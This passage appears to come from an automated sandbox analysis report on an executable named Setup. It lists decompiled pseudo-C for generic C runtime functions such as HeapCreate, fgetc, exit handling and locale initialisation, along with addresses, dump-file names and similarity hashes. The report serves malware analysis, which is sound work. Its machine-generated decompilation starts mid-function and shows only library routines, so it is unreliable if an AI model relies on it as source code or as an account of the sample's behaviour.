				_push( *[fs:0x0]);
				 *[fs:0x0] = _t137;
				_push(__ecx);
				_t138 = _t137 - 0x14;
				_push(_t80);
				_push(_t133);
				_v20 = _t138;
				_v40 = __ecx;
				if((E0041E850(_v40 +  *((intOrPtr*)( *_v40 + 4))) & 0x000000ff) == 0) {
					L16:
					E0041E1A0(_v40 +  *((intOrPtr*)( *_v40 + 4)), 2, 0);
					_t52 = 0;
					__eflags = 0;
				} else {
					if(E0041EDF0(_v40 +  *((intOrPtr*)( *_v40 + 4))) != 0) {
						E0041E0F0(E0041EDF0(_v40 +  *((intOrPtr*)( *_v40 + 4))), _v40 +  *((intOrPtr*)( *_v40 + 4)));
					}
					if((_a4 & 0x000000ff) == 0) {
						_t58 = E0041DDC0(_v40 +  *((intOrPtr*)( *_v40 + 4)));
						_t146 = _t58 & 0x00000001;
						if((_t58 & 0x00000001) != 0) {
							_t62 = E0041EE80(_t80, _t133, _t146, E0041DDE0(_v40 +  *((intOrPtr*)( *_v40 + 4)),  &_v32));
							_t139 = _t138 + 4;
							_v24 = _t62;
							E0041DD10( &_v32);
							_v8 = 0;
							_t66 = E0041E870(E0041E1D0(_v40 +  *((intOrPtr*)( *_v40 + 4)))); // executed
							_v28 = _t66;
							while(1) {
								_v36 = E004010B0(_t66);
								_t69 = E00401090( &_v36,  &_v28);
								_t140 = _t139 + 8;
								if((_t69 & 0x000000ff) != 0) {
									break;
								}
								_t71 = E004014C0( &_v28);
								_t139 = _t140 + 4;
								_t72 = E0041E820(_v24, 0x48, _t71 & 0x000000ff);
								__eflags = _t72 & 0x000000ff;
								if((_t72 & 0x000000ff) != 0) {
									__eflags = _v40 +  *((intOrPtr*)( *_v40 + 4));
									_v28 = E0041E8C0(E0041E1D0(_v40 +  *((intOrPtr*)( *_v40 + 4))));
									continue;
								} else {
								}
								L12:
								_v8 = 0xffffffff;
								goto L14;
							}
							E0041E1A0(_v40 +  *((intOrPtr*)( *_v40 + 4)), 1, 0);
							goto L12;
						}
					}
					L14:
					if((E0041E850(_v40 +  *((intOrPtr*)( *_v40 + 4))) & 0x000000ff) == 0) {
						goto L16;
					} else {
						_t52 = 1;
					}
				}
				 *[fs:0x0] = _v16;
				return _t52;
			}

























                                                                                                                                                                                              0x0041e653
                                                                                                                                                                                              0x0041e655
                                                                                                                                                                                              0x0041e660
                                                                                                                                                                                              0x0041e661
                                                                                                                                                                                              0x0041e668
                                                                                                                                                                                              0x0041e669
                                                                                                                                                                                              0x0041e66c
                                                                                                                                                                                              0x0041e66e
                                                                                                                                                                                              0x0041e66f
                                                                                                                                                                                              0x0041e672
                                                                                                                                                                                              0x0041e68c
                                                                                                                                                                                              0x0041e7f4
                                                                                                                                                                                              0x0041e803
                                                                                                                                                                                              0x0041e808
                                                                                                                                                                                              0x0041e808
                                                                                                                                                                                              0x0041e692
                                                                                                                                                                                              0x0041e6a4
                                                                                                                                                                                              0x0041e6ba
                                                                                                                                                                                              0x0041e6ba
                                                                                                                                                                                              0x0041e6c5
                                                                                                                                                                                              0x0041e6d6
                                                                                                                                                                                              0x0041e6db
                                                                                                                                                                                              0x0041e6de
                                                                                                                                                                                              0x0041e6f9
                                                                                                                                                                                              0x0041e6fe
                                                                                                                                                                                              0x0041e701
                                                                                                                                                                                              0x0041e707
                                                                                                                                                                                              0x0041e70c
                                                                                                                                                                                              0x0041e727
                                                                                                                                                                                              0x0041e72c
                                                                                                                                                                                              0x0041e74d
                                                                                                                                                                                              0x0041e752
                                                                                                                                                                                              0x0041e75d
                                                                                                                                                                                              0x0041e762
                                                                                                                                                                                              0x0041e76a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e78a
                                                                                                                                                                                              0x0041e78f
                                                                                                                                                                                              0x0041e79b
                                                                                                                                                                                              0x0041e7a3
                                                                                                                                                                                              0x0041e7a5
                                                                                                                                                                                              0x0041e739
                                                                                                                                                                                              0x0041e74a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e7a7
                                                                                                                                                                                              0x0041e7ab
                                                                                                                                                                                              0x0041e7d0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e7d0
                                                                                                                                                                                              0x0041e77d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e77d
                                                                                                                                                                                              0x0041e6de
                                                                                                                                                                                              0x0041e7d7
                                                                                                                                                                                              0x0041e7ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e7f0
                                                                                                                                                                                              0x0041e7f0
                                                                                                                                                                                              0x0041e7f0
                                                                                                                                                                                              0x0041e7ee
                                                                                                                                                                                              0x0041e80d
                                                                                                                                                                                              0x0041e81a

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: std::ios_base::fail
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1382825905-0
                                                                                                                                                                                              • Opcode ID: 1d9d47b1f1897f7c503ea5b2b33d24dd178d0a3b7e2319bfdf5231765f5896bc
                                                                                                                                                                                              • Instruction ID: 0533c29562bdf980b55953306513a92b58627f293c44ab6b0193b904b2d58f17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d9d47b1f1897f7c503ea5b2b33d24dd178d0a3b7e2319bfdf5231765f5896bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18518778A001049FCB04DB56C991AFEB7F2BF89304F24855EE9116B392DB3AED41DB94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040C4F0 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 544 40c4f0-40c512 HeapCreate 545 40c514-40c515 544->545 546 40c516-40c51f 544->546
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040C4F0(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				L" Product" = _t6;
				if(_t6 != 0) {
					 *0x456b2c = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                                                              0x0040c505
                                                                                                                                                                                              0x0040c50b
                                                                                                                                                                                              0x0040c512
                                                                                                                                                                                              0x0040c519
                                                                                                                                                                                              0x0040c51f
                                                                                                                                                                                              0x0040c515
                                                                                                                                                                                              0x0040c515
                                                                                                                                                                                              0x0040c515

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040C505
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: d1accf7484e21237665c6cb47a248d179a92f651b5a2b423547b6edc5568120c
                                                                                                                                                                                              • Instruction ID: 586fbec36fd3efa9bfe7020c2d9cff1fc98050641cd91f3425fa047aaa0a754f
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1accf7484e21237665c6cb47a248d179a92f651b5a2b423547b6edc5568120c
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1D05E36650304AEDB105FB1BC08B263BDCD78439AF008436F90CC7290E674D540DE08
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00402D5B Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 547 402d5b-402d63 call 407186 549 402d68-402d6c 547->549 550 402d72-402d7a 549->550 551 402d6e-402d71 549->551
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E00402D5B(void* __eflags, char* _a4, intOrPtr _a8) {
				void* __ebp;
				char _t3;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;

				_push(_a8);
				_t3 = E00407186(_t6, _t9, _t10, _t11, __eflags); // executed
				if(_t3 != 0xffffffff) {
					 *_a4 = _t3;
					return 1;
				} else {
					return 0;
				}
			}









                                                                                                                                                                                              0x00402d60
                                                                                                                                                                                              0x00402d63
                                                                                                                                                                                              0x00402d6c
                                                                                                                                                                                              0x00402d75
                                                                                                                                                                                              0x00402d7a
                                                                                                                                                                                              0x00402d6e
                                                                                                                                                                                              0x00402d71
                                                                                                                                                                                              0x00402d71

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _fgetc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 762172173-0
                                                                                                                                                                                              • Opcode ID: a7f71175f5144ac7ed36c6666ef4607034175fad7f9a307689e91f00fbf05e76
                                                                                                                                                                                              • Instruction ID: 7b5e4741d873206ed6ff7360ae91867e1bfb58c97d7d0ff9c2f4163f4e83a7a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f71175f5144ac7ed36c6666ef4607034175fad7f9a307689e91f00fbf05e76
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D022320002483ACF004A71B400CD93B188AA3338B200396F83C0B3E28936A882E100
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040DD75 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 552 40dd75-40dd81 call 40dc49 554 40dd86-40dd8a 552->554
                                                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                                                              			E0040DD75(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040DC49(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                                                                                                                                              0x0040dd7a
                                                                                                                                                                                              0x0040dd7c
                                                                                                                                                                                              0x0040dd7e
                                                                                                                                                                                              0x0040dd81
                                                                                                                                                                                              0x0040dd8a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _doexit.LIBCMT ref: 0040DD81
                                                                                                                                                                                                • Part of subcall function 0040DC49: __lock.LIBCMT ref: 0040DC57
                                                                                                                                                                                                • Part of subcall function 0040DC49: __decode_pointer.LIBCMT ref: 0040DC8E
                                                                                                                                                                                                • Part of subcall function 0040DC49: __decode_pointer.LIBCMT ref: 0040DCA3
                                                                                                                                                                                                • Part of subcall function 0040DC49: __decode_pointer.LIBCMT ref: 0040DCCD
                                                                                                                                                                                                • Part of subcall function 0040DC49: __decode_pointer.LIBCMT ref: 0040DCE3
                                                                                                                                                                                                • Part of subcall function 0040DC49: __decode_pointer.LIBCMT ref: 0040DCF0
                                                                                                                                                                                                • Part of subcall function 0040DC49: __initterm.LIBCMT ref: 0040DD1F
                                                                                                                                                                                                • Part of subcall function 0040DC49: __initterm.LIBCMT ref: 0040DD2F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1597249276-0
                                                                                                                                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                              • Instruction ID: c15bcca4423884e1ba498ba4a88041a8479499575de61663e0d053c870b3410e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FB0923298420833EA202582AC03F063B0987C0B64E240025BA0C291E1A9F3A9658489
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040BC1A Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 555 40bc1a-40bc1c call 40bba8 557 40bc21-40bc22 555->557
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040BC1A() {
				void* _t1;

				_t1 = E0040BBA8(0); // executed
				return _t1;
			}




                                                                                                                                                                                              0x0040bc1c
                                                                                                                                                                                              0x0040bc22

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 0040BC1C
                                                                                                                                                                                                • Part of subcall function 0040BBA8: TlsGetValue.KERNEL32(00000000,?,0040BC21,00000000,00414213,00456138,00000000,00000314,?,0040DF7C,00456138,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BBBA
                                                                                                                                                                                                • Part of subcall function 0040BBA8: TlsGetValue.KERNEL32(00000005,?,0040BC21,00000000,00414213,00456138,00000000,00000314,?,0040DF7C,00456138,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BBD1
                                                                                                                                                                                                • Part of subcall function 0040BBA8: RtlEncodePointer.NTDLL(00000000,?,0040BC21,00000000,00414213,00456138,00000000,00000314,?,0040DF7C,00456138,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BC0F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2585649348-0
                                                                                                                                                                                              • Opcode ID: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                              • Instruction ID: c211fbc6e75b8de34bfe44387625a6a0b96240b672e4127f22515c1e1d544e1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004190F0 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001000), ref: 004191AF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                              • Opcode ID: ae2d04e84a5f93a59ce806b65fc68115d0e79676e8deb429accd509265fabb4f
                                                                                                                                                                                              • Instruction ID: 50664bdbf12e009deae0c1d6f0c560d0515af73fd4f85d6495b03b9c1132e800
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d04e84a5f93a59ce806b65fc68115d0e79676e8deb429accd509265fabb4f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 312107B7E002186AF704D6A9DC46BD9BB29DBC9721F508332F918EB2C5D1749F4546C1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 004100FC Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004100FC(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E00412224(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E00412224(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E00412224(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E00412224(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E00412224(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E00412224(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E00412224(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E00412224(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E00412224(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E00412224(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E00412224(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E00412224(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E00412224(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E00412224(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E00412224(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E00412224(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E00412224(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E00412224(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E00412224(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E00412224(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E00412224(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E00412224(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E00412224(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E00412224(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E00412224(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E00412224(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E00412224(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E00412224(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E00412224(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E00412224(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E00412224(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E00412224(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E00412224(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E00412224(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E00412224(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E00412224(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E00412224(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E00412224(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E00412224(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E00412224(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E00412224(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E00412224(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E00412224(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E00412224(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                                                                                                                                                                                              0x00410104
                                                                                                                                                                                              0x00410108
                                                                                                                                                                                              0x0041010c
                                                                                                                                                                                              0x0041010f
                                                                                                                                                                                              0x00410114
                                                                                                                                                                                              0x0041011b
                                                                                                                                                                                              0x00410121
                                                                                                                                                                                              0x00410133
                                                                                                                                                                                              0x00410148
                                                                                                                                                                                              0x0041015d
                                                                                                                                                                                              0x00410172
                                                                                                                                                                                              0x0041018a
                                                                                                                                                                                              0x0041019f
                                                                                                                                                                                              0x004101b1
                                                                                                                                                                                              0x004101c6
                                                                                                                                                                                              0x004101de
                                                                                                                                                                                              0x004101f3
                                                                                                                                                                                              0x00410208
                                                                                                                                                                                              0x0041021d
                                                                                                                                                                                              0x00410235
                                                                                                                                                                                              0x0041024a
                                                                                                                                                                                              0x0041025f
                                                                                                                                                                                              0x00410274
                                                                                                                                                                                              0x0041028c
                                                                                                                                                                                              0x004102a1
                                                                                                                                                                                              0x004102b6
                                                                                                                                                                                              0x004102cb
                                                                                                                                                                                              0x004102e3
                                                                                                                                                                                              0x004102f8
                                                                                                                                                                                              0x0041030d
                                                                                                                                                                                              0x00410322
                                                                                                                                                                                              0x0041033a
                                                                                                                                                                                              0x0041034f
                                                                                                                                                                                              0x00410364
                                                                                                                                                                                              0x00410379
                                                                                                                                                                                              0x00410391
                                                                                                                                                                                              0x004103a6
                                                                                                                                                                                              0x004103bb
                                                                                                                                                                                              0x004103d0
                                                                                                                                                                                              0x004103eb
                                                                                                                                                                                              0x00410403
                                                                                                                                                                                              0x0041041b
                                                                                                                                                                                              0x00410433
                                                                                                                                                                                              0x0041044e
                                                                                                                                                                                              0x00410466
                                                                                                                                                                                              0x0041047e
                                                                                                                                                                                              0x00410496
                                                                                                                                                                                              0x004104b1
                                                                                                                                                                                              0x004104c9
                                                                                                                                                                                              0x004104e4
                                                                                                                                                                                              0x004104f7
                                                                                                                                                                                              0x00410501
                                                                                                                                                                                              0x0041050e
                                                                                                                                                                                              0x00410516
                                                                                                                                                                                              0x00410116
                                                                                                                                                                                              0x0041011a
                                                                                                                                                                                              0x0041011a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
